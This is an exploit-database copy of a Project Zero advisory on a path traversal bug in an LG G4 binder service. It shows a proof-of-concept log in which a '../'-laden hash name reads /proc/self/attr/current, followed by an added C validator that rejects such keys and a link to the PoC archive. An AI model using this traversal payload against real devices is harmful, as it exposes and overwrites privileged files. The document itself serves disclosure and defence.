LG G4 – lghashstorageserver Directory Traversal

  • Author: Google Security Research
    Date: 2017-02-14
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/41352/
  • Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=987
    
    The lghashstorageserver binder service (/system/bin/lghashstorageserver) 
    implementation on the LG G4 is vulnerable to path traversal, allowing an
    app to read and write 0x20 bytes from any file in the context of the
    lghashstorageserver.
    
    See attached for a PoC which reads from /proc/self/attr/current for the 
    lghashstorageserver.
    
    [0] opening /dev/binder
    [0] looking up service lghashstorage
    0000: 00 . 01 . 00 . 00 . 1a . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 .
    0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 6f o 00 . 73 s 00 . 2e . 00 . 49 I 00 .
    0032: 53 S 00 . 65 e 00 . 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 4d M 00 .
    0048: 61 a 00 . 6e n 00 . 61 a 00 . 67 g 00 . 65 e 00 . 72 r 00 . 00 . 00 . 00 . 00 .
    0064: 0d . 00 . 00 . 00 . 6c l 00 . 67 g 00 . 68 h 00 . 61 a 00 . 73 s 00 . 68 h 00 .
    0080: 73 s 00 . 74 t 00 . 6f o 00 . 72 r 00 . 61 a 00 . 67 g 00 . 65 e 00 . 00 . 00 .
    BR_NOOP:
    BR_TRANSACTION_COMPLETE:
    BR_NOOP:
    BR_REPLY:
    target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000
    pid 0 uid 1000 data 24 offs 8
    0000: 85 . 2a * 68 h 73 s 7f . 01 . 00 . 00 . 01 . 00 . 00 . 00 . 55 U 00 . 00 . 00 .
    0016: 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
    - type 73682a85 flags 0000017f ptr 0000005500000001 cookie 0000000000000000
    [0] got handle 00000001
    [0] reading hash
    0000: 00 . 01 . 00 . 00 . 1b . 00 . 00 . 00 . 63 c 00 . 6f o 00 . 6d m 00 . 2e . 00 .
    0016: 6c l 00 . 67 g 00 . 65 e 00 . 2e . 00 . 49 I 00 . 48 H 00 . 61 a 00 . 73 s 00 .
    0032: 68 h 00 . 53 S 00 . 74 t 00 . 6f o 00 . 72 r 00 . 61 a 00 . 67 g 00 . 65 e 00 .
    0048: 53 S 00 . 65 e 00 . 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 00 . 00 .
    0064: 2e . 2e . 2f / 2e . 2e . 2f / 2e . 2e . 2f / 2e . 2e . 2f / 2e . 2e . 2f / 2e .
    0080: 2e . 2f / 2e . 2e . 2f / 70 p 72 r 6f o 63 c 2f / 73 s 65 e 6c l 66 f 2f / 61 a
    0096: 74 t 74 t 72 r 2f / 63 c 75 u 72 r 72 r 65 e 6e n 74 t 00 . 00 . 00 . 00 . 00 .
    BR_NOOP:
    BR_TRANSACTION_COMPLETE:
    BR_NOOP:
    BR_REPLY:
    target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000
    pid 0 uid 1000 data 36 offs 0
    0000: 75 u 3a : 72 r 3a : 6c l 67 g 68 h 61 a 73 s 68 h 73 s 74 t 6f o 72 r 61 a 67 g
    0016: 65 e 73 s 65 e 72 r 76 v 65 e 72 r 3a : 73 s 30 0 00 . 00 . 00 . 00 . 00 . 00 .
    0032: 00 . 00 . 00 . 00 .
    u:r:lghashstorageserver:s0
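
    The log above shows a hash-read request carrying the string
    ../../../../../../../proc/self/attr/current where a hash name is expected,
    and a reply containing u:r:lghashstorageserver:s0, i.e. the contents of
    that file as read by the service. The C check below is an added example
    written for this page, not code from LG or Project Zero; the base
    directory /data/lghashstorage, the 0x20-byte record size and the function
    names are assumptions. It accepts only a single plain path component as the
    hash key, so the traversal string from the log is rejected before any file
    is opened.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed storage directory for hash records (hypothetical, not LG's path). */
#define HASH_DIR "/data/lghashstorage"
/* Size of one hash record, matching the 0x20 bytes described in the report. */
#define HASH_LEN 0x20
/* Upper bound on a hash key so a caller cannot push the path past PATH_MAX. */
#define HASH_NAME_MAX 64

/*
 * Return 1 if `name` is an acceptable hash key: non-empty, bounded in length,
 * not "." or "..", and made only of [A-Za-z0-9._-]. Any '/' (and therefore
 * any "../" sequence) fails the character check, so the key can never name a
 * file outside HASH_DIR.
 */
int is_safe_hash_name(const char *name) {
    if (name == NULL || name[0] == '\0') return 0;
    if (strlen(name) > HASH_NAME_MAX) return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return 0;
    for (const char *p = name; *p != '\0'; p++) {
        unsigned char c = (unsigned char)*p;
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-')) return 0;
    }
    return 1;
}

/*
 * Build the on-disk path HASH_DIR/<name> into `out`. Returns 1 on success,
 * 0 if the key is rejected or the buffer is too small. Only a validated key
 * is ever joined to the directory, so no canonicalisation step is needed.
 */
int build_hash_path(const char *name, char *out, size_t outlen) {
    if (!is_safe_hash_name(name)) return 0;
    int n = snprintf(out, outlen, "%s/%s", HASH_DIR, name);
    if (n < 0 || (size_t)n >= outlen) return 0;
    return 1;
}

int main(void) {
    /* Constructed inputs: a benign key and the traversal string from the log. */
    const char *keys[] = {
        "abc123",
        "../../../../../../../proc/self/attr/current",
    };
    char path[256];
    for (size_t i = 0; i < sizeof keys / sizeof keys[0]; i++) {
        if (build_hash_path(keys[i], path, sizeof path))
            printf("accepted: %s -> %s (%d-byte record)\n", keys[i], path, HASH_LEN);
        else
            printf("rejected: %s\n", keys[i]);
    }
    return 0;
}
```

    Keeping the key to one path component is simpler and more robust than
    calling realpath() on the joined path: realpath() needs the target to
    exist, which does not hold for the write case, and the allow-list above
    also blocks NUL-free tricks such as encoded separators that a denylist of
    ".." would miss.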
    
    
    Proof of Concept:
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41352.zip